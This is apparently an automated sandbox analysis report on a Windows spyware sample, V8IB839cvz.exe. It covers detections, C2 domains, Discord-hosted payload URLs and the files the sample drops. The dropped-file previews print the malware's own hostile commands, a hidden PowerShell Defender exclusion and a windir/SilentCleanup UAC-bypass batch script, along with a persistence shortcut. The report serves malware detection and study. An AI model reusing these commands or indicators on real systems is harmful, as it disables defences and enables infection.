              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 429553 Sample: V8IB839cvz.exe Startdate: 04/06/2021 Architecture: WINDOWS Score: 100 35 nothinglike.ac.ug 2->35 37 brudfascaqezd.ac.ug 2->37 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 4 other signatures 2->57 9 V8IB839cvz.exe 1 23 2->9         started        14 Xypgtv.exe 13 2->14         started        16 Xypgtv.exe 13 2->16         started        signatures3 process4 dnsIp5 43 cdn.discordapp.com 162.159.130.233, 443, 49729, 49730 CLOUDFLARENETUS United States 9->43 33 C:\Users\Public\Xypgtv\Xypgtv.exe, PE32 9->33 dropped 59 Detected unpacking (overwrites its own PE header) 9->59 61 Contains functionality to steal Chrome passwords or cookies 9->61 63 Contains functionality to steal Firefox passwords or cookies 9->63 65 Delayed program exit found 9->65 18 V8IB839cvz.exe 1 9->18         started        21 cmd.exe 1 9->21         started        45 162.159.134.233, 443, 49755 CLOUDFLARENETUS United States 14->45 47 192.168.2.1 unknown unknown 14->47 67 Multi AV Scanner detection for dropped file 14->67 69 Machine Learning detection for dropped file 14->69 71 Injects a PE file into a foreign processes 14->71 23 Xypgtv.exe 14->23         started        49 162.159.133.233, 443, 49759 CLOUDFLARENETUS United States 16->49 25 Xypgtv.exe 16->25         started        file6 signatures7 process8 dnsIp9 39 nothinglike.ac.ug 79.134.225.25, 49745, 49748, 49751 FINK-TELECOM-SERVICESCH Switzerland 18->39 41 brudfascaqezd.ac.ug 18->41 27 cmd.exe 1 21->27         started        29 conhost.exe 21->29         started        process10 process11 31 conhost.exe 27->31         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              V8IB839cvz.exe41%ReversingLabsWin32.Spyware.Noon
              V8IB839cvz.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\Public\Xypgtv\Xypgtv.exe100%Joe Sandbox ML
              C:\Users\Public\Xypgtv\Xypgtv.exe41%ReversingLabsWin32.Spyware.Noon

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              17.2.Xypgtv.exe.400000.0.unpack100%AviraHEUR/AGEN.1141389Download File
              15.2.Xypgtv.exe.400000.0.unpack100%AviraHEUR/AGEN.1141389Download File
              2.2.V8IB839cvz.exe.400000.0.unpack100%AviraHEUR/AGEN.1141389Download File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              nothinglike.ac.ug0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              cdn.discordapp.com
              162.159.130.233
              truefalse
                high
                nothinglike.ac.ug
                79.134.225.25
                truetrue
                  unknown
                  brudfascaqezd.ac.ug
                  unknown
                  unknowntrue
                    unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    nothinglike.ac.ugtrue
                    • Avira URL Cloud: safe
                    unknown

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    79.134.225.25
                    nothinglike.ac.ugSwitzerland
                    6775FINK-TELECOM-SERVICESCHtrue
                    162.159.130.233
                    cdn.discordapp.comUnited States
                    13335CLOUDFLARENETUSfalse
                    162.159.133.233
                    unknownUnited States
                    13335CLOUDFLARENETUSfalse
                    162.159.134.233
                    unknownUnited States
                    13335CLOUDFLARENETUSfalse

                    Private

                    IP
                    192.168.2.1

                    General Information

                    Joe Sandbox Version:32.0.0 Black Diamond
                    Analysis ID:429553
                    Start date:04.06.2021
                    Start time:09:39:07
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 11m 51s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:V8IB839cvz.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:21
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@16/9@96/5
                    EGA Information:Failed
                    HDC Information:
                    • Successful, ratio: 32.9% (good quality ratio 30.6%)
                    • Quality average: 78.7%
                    • Quality standard deviation: 28%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .exe
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                    • TCP Packets have been reduced to 100
                    • Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.43.139.144, 104.43.193.48, 13.88.21.125, 40.88.32.150, 104.42.151.234, 52.147.198.201, 20.50.102.62, 52.155.217.156, 205.185.216.42, 205.185.216.10, 20.54.26.129, 92.122.213.247, 92.122.213.194, 20.82.210.154
                    • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/429553/sample/V8IB839cvz.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    09:39:54API Interceptor3x Sleep call for process: V8IB839cvz.exe modified
                    09:40:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Xypgtv C:\Users\Public\vtgpyX.url
                    09:40:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Xypgtv C:\Users\Public\vtgpyX.url
                    09:40:24API Interceptor4x Sleep call for process: Xypgtv.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    79.134.225.25afp-00553223.pdf.exeGet hashmaliciousBrowse
                      To1sRo1E8P.exeGet hashmaliciousBrowse
                        BhTxt5BUvy.exeGet hashmaliciousBrowse
                          5H957qLghX.exeGet hashmaliciousBrowse
                            yQY73z6zaP.exeGet hashmaliciousBrowse
                              Delivery pdf.exeGet hashmaliciousBrowse
                                fnfqzfwC44.exeGet hashmaliciousBrowse
                                  Form pdf.exeGet hashmaliciousBrowse
                                    Purchase Order3.scr.exeGet hashmaliciousBrowse
                                      PURCHASE_ORDER2.scr.exeGet hashmaliciousBrowse
                                        M1agnNpcj2.exeGet hashmaliciousBrowse
                                          162.159.130.233order-confirmation.doc__.rtfGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
                                          Order Confirmation.docGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
                                          cfe14e87_by_Libranalysis.rtfGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/520353354304585730/839557970173100102/ew.exe
                                          SkKcQaHEB8.exeGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
                                          P20200107.DOCGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
                                          FBRO ORDER SHEET - YATSAL SUMMER 2021.exeGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/832005460982235229/836405556838924308/usd.exe
                                          SKM_C258 Up21042213080.exeGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
                                          SKM_C258 Up21042213080.exeGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
                                          G019 & G022 SPEC SHEET.exeGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
                                          Marking Machine 30W Specification.exeGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
                                          2021 RFQ Products Required.docGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/821511904769998921/821511945881911306/panam.exe
                                          Company Reference1.docGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/819949436054536222/820935251337281546/nbalax.exe
                                          PAY SLIP.docGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
                                          SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.25071.rtfGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/785423761461477416/785424240047947786/angelrawfile.exe
                                          part1.rtfGet hashmaliciousBrowse
                                          • cdn.discordapp.com/attachments/783666652440428545/783667553490698250/kdot.exe

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          cdn.discordapp.comSOA #220953.exeGet hashmaliciousBrowse
                                          • 162.159.129.233
                                          soa5.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          soa5.exeGet hashmaliciousBrowse
                                          • 162.159.134.233
                                          Rendi i ri eshte i bashkangjitur.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          Rendi i ri eshte i bashkangjitur.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          68avRiNoDd.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          Invoice.05192921.exeGet hashmaliciousBrowse
                                          • 162.159.135.233
                                          ItQw2Ud9WL.exeGet hashmaliciousBrowse
                                          • 162.159.129.233
                                          Kv6wO46d8e.exeGet hashmaliciousBrowse
                                          • 162.159.129.233
                                          FOB offer_1164087223_I0133P2100363812.pdf (1).exeGet hashmaliciousBrowse
                                          • 162.159.135.233
                                          SecuriteInfo.com.Troj.Kryptik-TR.10844.exeGet hashmaliciousBrowse
                                          • 162.159.134.233
                                          SecuriteInfo.com.Troj.Kryptik-TR.30930.exeGet hashmaliciousBrowse
                                          • 162.159.134.233
                                          Payment Invoice _ Purchase Invoice Mar 2021.docmGet hashmaliciousBrowse
                                          • 162.159.129.233
                                          SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.29692.rtfGet hashmaliciousBrowse
                                          • 162.159.135.233
                                          SecuriteInfo.com.W32.AIDetect.malware2.9276.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          tes.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          YH6Zy2Q5e2.docGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          New order 201534.docGet hashmaliciousBrowse
                                          • 162.159.135.233
                                          003 SOA.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          eBay-invoice-2195921.vbsGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          nothinglike.ac.ug8B1C960881FC789460B5B274ABD43BADDB1C92E1A942D.exeGet hashmaliciousBrowse
                                          • 79.134.225.25
                                          To1sRo1E8P.exeGet hashmaliciousBrowse
                                          • 79.134.225.25
                                          wNgiGmsOwT.exeGet hashmaliciousBrowse
                                          • 79.134.225.25
                                          BhTxt5BUvy.exeGet hashmaliciousBrowse
                                          • 79.134.225.25
                                          5H957qLghX.exeGet hashmaliciousBrowse
                                          • 79.134.225.25
                                          yQY73z6zaP.exeGet hashmaliciousBrowse
                                          • 79.134.225.25
                                          h1gMAKBj8d.exeGet hashmaliciousBrowse
                                          • 79.134.225.25
                                          2df27f1a3505dbd0995188d49c253f5bc53c0e994954c.exeGet hashmaliciousBrowse
                                          • 79.134.225.25
                                          1AQz4ua1TU.exeGet hashmaliciousBrowse
                                          • 79.134.225.25
                                          fnfqzfwC44.exeGet hashmaliciousBrowse
                                          • 79.134.225.25
                                          UNiOOhIN3e.exeGet hashmaliciousBrowse
                                          • 185.244.30.241
                                          bDbA5Bf1k2.exeGet hashmaliciousBrowse
                                          • 185.244.30.241
                                          mDxyEfHSMs.exeGet hashmaliciousBrowse
                                          • 185.244.30.241
                                          z3LPr7pOcN.exeGet hashmaliciousBrowse
                                          • 185.140.53.149
                                          OOQ10YZ15n.exeGet hashmaliciousBrowse
                                          • 185.140.53.149
                                          xytEWWD2QN.exeGet hashmaliciousBrowse
                                          • 185.140.53.149
                                          itqFYYnm5j.exeGet hashmaliciousBrowse
                                          • 185.140.53.149
                                          e7zQwqIDCO.exeGet hashmaliciousBrowse
                                          • 185.140.53.149
                                          eTDAg77Nif.exeGet hashmaliciousBrowse
                                          • 185.140.53.149
                                          hG8XQh9hMy.exeGet hashmaliciousBrowse
                                          • 185.140.53.149

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          CLOUDFLARENETUSAW94CUMB58.exeGet hashmaliciousBrowse
                                          • 172.67.181.37
                                          new_fax_message.htmlGet hashmaliciousBrowse
                                          • 104.18.11.207
                                          Urgent RFQ_AP65425652_032421,pdf.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          VM_5823_05_24_2-2.htmlGet hashmaliciousBrowse
                                          • 104.18.11.207
                                          TT Swif_66E3563653553_PDF_.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          IMG_15_60_103_681.xlsxGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          INVOICE SC1289.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          Payment Slip.exeGet hashmaliciousBrowse
                                          • 172.67.188.154
                                          PO-8372929.exeGet hashmaliciousBrowse
                                          • 172.67.188.154
                                          v1RXFMUMfIXWvDX.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          SecuriteInfo.com.Trojan.GenericKD.46394915.32529.exeGet hashmaliciousBrowse
                                          • 172.67.134.204
                                          Secured-Message_7634-7.htmlGet hashmaliciousBrowse
                                          • 104.18.11.207
                                          SecuriteInfo.com.Trojan.Win32.Save.a.6900.exeGet hashmaliciousBrowse
                                          • 172.67.206.72
                                          _Vm064855583.HtMGet hashmaliciousBrowse
                                          • 104.18.11.207
                                          SOA #093732.exeGet hashmaliciousBrowse
                                          • 172.67.130.122
                                          0900009000000000.exeGet hashmaliciousBrowse
                                          • 172.67.188.154
                                          _.htmlGet hashmaliciousBrowse
                                          • 104.18.10.207
                                          SOA #220953.exeGet hashmaliciousBrowse
                                          • 162.159.135.233
                                          1.dllGet hashmaliciousBrowse
                                          • 104.20.185.68
                                          MT103.exeGet hashmaliciousBrowse
                                          • 172.67.188.154
                                          CLOUDFLARENETUSAW94CUMB58.exeGet hashmaliciousBrowse
                                          • 172.67.181.37
                                          new_fax_message.htmlGet hashmaliciousBrowse
                                          • 104.18.11.207
                                          Urgent RFQ_AP65425652_032421,pdf.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          VM_5823_05_24_2-2.htmlGet hashmaliciousBrowse
                                          • 104.18.11.207
                                          TT Swif_66E3563653553_PDF_.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          IMG_15_60_103_681.xlsxGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          INVOICE SC1289.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          Payment Slip.exeGet hashmaliciousBrowse
                                          • 172.67.188.154
                                          PO-8372929.exeGet hashmaliciousBrowse
                                          • 172.67.188.154
                                          v1RXFMUMfIXWvDX.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          SecuriteInfo.com.Trojan.GenericKD.46394915.32529.exeGet hashmaliciousBrowse
                                          • 172.67.134.204
                                          Secured-Message_7634-7.htmlGet hashmaliciousBrowse
                                          • 104.18.11.207
                                          SecuriteInfo.com.Trojan.Win32.Save.a.6900.exeGet hashmaliciousBrowse
                                          • 172.67.206.72
                                          _Vm064855583.HtMGet hashmaliciousBrowse
                                          • 104.18.11.207
                                          SOA #093732.exeGet hashmaliciousBrowse
                                          • 172.67.130.122
                                          0900009000000000.exeGet hashmaliciousBrowse
                                          • 172.67.188.154
                                          _.htmlGet hashmaliciousBrowse
                                          • 104.18.10.207
                                          SOA #220953.exeGet hashmaliciousBrowse
                                          • 162.159.135.233
                                          1.dllGet hashmaliciousBrowse
                                          • 104.20.185.68
                                          MT103.exeGet hashmaliciousBrowse
                                          • 172.67.188.154
                                          FINK-TELECOM-SERVICESCHA2PlnLyOA7.exeGet hashmaliciousBrowse
                                          • 79.134.225.90
                                          PDF 209467_9377363745_378341152.exeGet hashmaliciousBrowse
                                          • 79.134.225.11
                                          v4nJnRl1gt.exeGet hashmaliciousBrowse
                                          • 79.134.225.9
                                          Invoice#282730.exeGet hashmaliciousBrowse
                                          • 79.134.225.9
                                          Urban Receipt.exeGet hashmaliciousBrowse
                                          • 79.134.225.9
                                          PO_20210.EXEGet hashmaliciousBrowse
                                          • 79.134.225.17
                                          SecuriteInfo.com.Trojan.GenericKD.37013274.28794.exeGet hashmaliciousBrowse
                                          • 79.134.225.90
                                          LOT_20210526.xlsxGet hashmaliciousBrowse
                                          • 79.134.225.90
                                          rf1K94mmmC.exeGet hashmaliciousBrowse
                                          • 79.134.225.17
                                          Outward Remittancepdf.exeGet hashmaliciousBrowse
                                          • 79.134.225.96
                                          afp-00553223.pdf.exeGet hashmaliciousBrowse
                                          • 79.134.225.25
                                          Q2MAUt4mRO.exeGet hashmaliciousBrowse
                                          • 79.134.225.90
                                          4fn66P5vkl.exeGet hashmaliciousBrowse
                                          • 79.134.225.90
                                          P_O 00041221.xlsxGet hashmaliciousBrowse
                                          • 79.134.225.90
                                          LOT_20210526.xlsxGet hashmaliciousBrowse
                                          • 79.134.225.90
                                          Z5CoLMcXk1.exeGet hashmaliciousBrowse
                                          • 79.134.225.69
                                          fUt23uSFwh.exeGet hashmaliciousBrowse
                                          • 79.134.225.18
                                          rpsmtJslZb.vbsGet hashmaliciousBrowse
                                          • 79.134.225.10
                                          https___cdn-111.anonfiles.com_heCeW9x6u7_3be78282-1622068029_PO_20880538.exeGet hashmaliciousBrowse
                                          • 79.134.225.7
                                          PO# JNE81H10-4 SOLSITIGES REQUOTATION FOR PURCHASE - H#80-281.exeGet hashmaliciousBrowse
                                          • 79.134.225.5

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          37f463bf4616ecd445d4a1937da06e196qpuabiBHa.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          Invoice.xlsmGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          Prudential Investment Services.docGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          N1LUjx76rV.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          0izHwHXyfm.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          gtJl8IPauk.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          SOA #220953.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          soa5.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          soa5.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          HUa0EaTZco.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          Xerox scan.htmlGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          Rendi i ri eshte i bashkangjitur.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          Rendi i ri eshte i bashkangjitur.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          sample-20200604.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          sample-20200604.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          #Ud83d#Udcde_Message_Received_05_19_21.htm.htmGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          JC0KUeH450.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          oNd23tLLxr.exeGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233
                                          Donation Receipt 36561536.docGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          • 162.159.133.233
                                          • 162.159.134.233

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\Public\KDECO.bat
                                          Process:C:\Users\user\Desktop\V8IB839cvz.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):155
                                          Entropy (8bit):4.687076340713226
                                          Encrypted:false
                                          SSDEEP:3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
                                          MD5:213C60ADF1C9EF88DC3C9B2D579959D2
                                          SHA1:E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
                                          SHA-256:37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
                                          SHA-512:FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview: start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit
                                          C:\Users\Public\Trast.bat
                                          Process:C:\Users\user\Desktop\V8IB839cvz.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):34
                                          Entropy (8bit):4.314972767530033
                                          Encrypted:false
                                          SSDEEP:3:LjTnaHF5wlM:rnaHSM
                                          MD5:4068C9F69FCD8A171C67F81D4A952A54
                                          SHA1:4D2536A8C28CDCC17465E20D6693FB9E8E713B36
                                          SHA-256:24222300C78180B50ED1F8361BA63CB27316EC994C1C9079708A51B4A1A9D810
                                          SHA-512:A64F9319ACC51FFFD0491C74DCD9C9084C2783B82F95727E4BFE387A8528C6DCF68F11418E88F1E133D115DAF907549C86DD7AD866B2A7938ADD5225FBB2811D
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview: start /min C:\Users\Public\UKO.bat
                                          C:\Users\Public\UKO.bat
                                          Process:C:\Users\user\Desktop\V8IB839cvz.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):250
                                          Entropy (8bit):4.865356627324657
                                          Encrypted:false
                                          SSDEEP:6:rgnMXd1CQnMXd1COm8hnaHNHIXUnMXd1CoD9c1uOw1H1gOvOBAn:rgamIHIXUaXe1uOeVqy
                                          MD5:EAF8D967454C3BBDDBF2E05A421411F8
                                          SHA1:6170880409B24DE75C2DC3D56A506FBFF7F6622C
                                          SHA-256:F35F2658455A2E40F151549A7D6465A836C33FA9109E67623916F889849EAC56
                                          SHA-512:FE5BE5C673E99F70C93019D01ABB0A29DD2ECF25B2D895190FF551F020C28E7D8F99F65007F440F0F76C5BCAC343B2A179A94D190C938EA3B9E1197890A412E9
                                          Malicious:false
                                          Preview: reg delete hkcu\Environment /v windir /f..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I & exit..
                                          C:\Users\Public\Xypgtv\Xypgtv.exe
                                          Process:C:\Users\user\Desktop\V8IB839cvz.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):690178
                                          Entropy (8bit):6.950419723768229
                                          Encrypted:false
                                          SSDEEP:12288:4wZeGjiyhybwk6VAn0+A2NUj4pfIMNFYoOOikh4AOpbAF++n/tq:4sjhyZn4VuIMz8AAbAl/tq
                                          MD5:10D42F55D89B6FD42404E470E68F1996
                                          SHA1:3B9787BBFAAE456FE082DB8E2E61C70C5FB45328
                                          SHA-256:B84A345EFDDFA5A852C3E3C5C2C97DAB1A6F4643906D80C0C8CAFA1E25247326
                                          SHA-512:13403037FADBCA2F2DF76946D21EED91AFF9418A24ED1CE87C667447C352CD9EC50CDBFDA9D64EE51FBD879FBAB3610DAFBB12D3272332B16BCD8736395B31CE
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 41%
                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................."...........................`...i...........................P......................................................CODE....l........................... ..`DATA................................@...BSS.....q................................idata...".......$..................@....tls.........@...........................rdata.......P......................@..P.reloc...i...`...j..................@..P.rsrc................v..............@..P............. ......................@..P........................................................................................................................................
                                          C:\Users\Public\nest
                                          Process:C:\Users\user\Desktop\V8IB839cvz.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):8
                                          Entropy (8bit):3.0
                                          Encrypted:false
                                          SSDEEP:3:8vn:8vn
                                          MD5:0A666A12354EAE791661C1CE159A69AC
                                          SHA1:E7C7371C04C376BD74D0CF69C6A2360011D140BA
                                          SHA-256:A87D5B8EF1668068D22B2A226BD3C9FCBBDF554750D18319EF13B746D38B74CF
                                          SHA-512:6BEE681EDF46654419CD8B943AD46A7D8257B41D3486D2C0299AC98FEFAC3B8E598243C16E9060F26BFBCA2EFEA53794692FE33EBEC0480E576187DC9552A445
                                          Malicious:false
                                          Preview: Xypgtv..
                                          C:\Users\Public\vtgpyX.url
                                          Process:C:\Users\user\Desktop\V8IB839cvz.exe
                                          File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Xypgtv\\Xypgtv.exe">), ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):83
                                          Entropy (8bit):4.9179828413523765
                                          Encrypted:false
                                          SSDEEP:3:HRAbABGQYmTWAX+rSF55+MT+oRTL4bsGKd6ov:HRYFVmTWDySomsbDv
                                          MD5:719E8AB2AA893E297808AC73867E8C62
                                          SHA1:BA519ED8B0C50F2A928BAAACC2E7373710A1EB51
                                          SHA-256:DDE2E95AEDC7BD872AAFCF17FB3A3D69546044EF07CBD79317EDD2038826086A
                                          SHA-512:C0B62D3A839B810F157773F14805BDC0DF1A73489C59FA7BCC7190809D2A6515CA5344729026969D905257E8F0EF31EA843784FE16C741BE0709CC858C4C9F6D
                                          Malicious:false
                                          Yara Hits:
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\vtgpyX.url, Author: @itsreallynick (Nick Carr)
                                          Preview: [InternetShortcut]..URL=file:"C:\\Users\\Public\\Xypgtv\\Xypgtv.exe"..IconIndex=2..
                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Xypgtvglqrlgdvgezyimsisukuqhicz[1]
                                          Process:C:\Users\Public\Xypgtv\Xypgtv.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):536576
                                          Entropy (8bit):7.589312195933217
                                          Encrypted:false
                                          SSDEEP:12288:YATVsnavJYSyMuglMbn6834oiuE7uL+2psMCDPs:YATVtyJMFMbn68oo7E7ui2psdU
                                          MD5:04409EA53817D75CD40FC7653592D001
                                          SHA1:4DC7DD23E4A02D6BFF089BAC32285CD8C12F4250
                                          SHA-256:8F4220EF61F0352918F5DDA825014FA67C342A9C2864DEF4E0DCE8FF23819EEE
                                          SHA-512:FF1DCA551C9D4D26D34A3C089E8BD008FD0C277D3F834AC8D32E8FD5620403A4CB9B829E9BC243B80646281B084645C25FC60AA76A88A6E12C2B7681E0E99562
                                          Malicious:false
